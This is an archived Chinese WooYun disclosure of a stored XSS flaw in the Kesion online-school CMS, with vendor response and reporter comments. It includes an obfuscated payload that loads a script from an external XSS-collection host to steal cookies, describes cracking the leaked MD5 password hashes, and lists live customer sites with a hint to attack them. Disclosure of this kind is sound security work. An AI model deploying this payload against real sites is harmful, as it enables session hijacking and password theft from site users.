当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111733

漏洞标题:科讯网校系统xss漏洞(密码为MD5加密)

相关厂商:kesion.com

漏洞作者: 小龙

提交时间:2015-05-08 19:07

修复时间:2015-08-07 09:26

公开时间:2015-08-07 09:26

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-08: 细节已通知厂商并且等待厂商处理中
2015-05-09: 厂商已经确认,细节仅向厂商公开
2015-05-12: 细节向第三方安全合作伙伴开放
2015-07-03: 细节向核心白帽子及相关领域专家公开
2015-07-13: 细节向普通白帽子公开
2015-07-23: 细节向实习白帽子公开
2015-08-07: 细节向公众公开

简要描述:

大CMS厂商。。
http://www.kesion.com/
已有 469,628 个网站选择KESION产品搭建,今日新增网站 104 个
拿了好多证书。

详细说明:

首先在他们网站
http://e.kesion.com/model/view.aspx?m_id=3&id=4373
我目测只要有回复框就百分百存在这漏洞
而且全站判断的方式一样
为什么这样说呢
往下面看就知道了
http://e.kesion.com/model/view.aspx?m_id=3&id=4373
2014年司法考试历年真题课件-民法
OK
我们当然像二哥说的,不要见框就插,我们先试下,别那么着急插入js
<img src="1" onerror=alert("1")>
提交看下

1.png


那么知道了。。那么我们用Xss测试字符串转换工具转换下
然后把js转换,
插进去

<img/src=http://www.baidu.com/img/baidu_sylogo1.gif onload=(function(){window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,46,104,97,99,107,116,97,115,107,46,110,101,116,47,75,48,84,79,97,115,63,49,52,51,48,53,55,57,52,52,50);document.body.appendChild(window.s)})()>


然后获取到了cookie

2.png


平台看下

3.png


这么弱智的加密。。自己还是个知名的cms,客户那么多,无语了。。
安全要注重丫,亲
拿到密码来:http://pmd5.com
解密
得到密码

4.png


接下来他给出了几个比较大的案例,当然这是大的,我估计小的也是很多的。。他们签了好多合同了,我没必要多说啦。。
看他们的漏洞案例哈。

漏洞证明:

筑诚造价网校


1.png


弘智网校


http://www.hzwx.com/a/1141.aspx

2.png


其实案例全部加上 /ask
就进入问答社区了
然后你们懂得

修复方案:

过滤特殊符号,并通知所有站长更新并打补丁,密码切记别用MD5加密,太可逆了

版权声明:转载请注明来源 小龙@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-05-09 09:24

厂商回复:

已有人提交过该类漏洞,不过还是感谢你!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-09 21:16 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    @KesionCMS 是多久提交的啊?呵呵,我测试的那一天的晚上,我提交之前发现也有人测试了,呵呵,你要搞清楚时间好吧。我也是醉了

  2. 2015-05-09 21:17 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    说错了,是我测试之后,提交了,然后那天也有一个ID在测试,不过我都已经提交了。。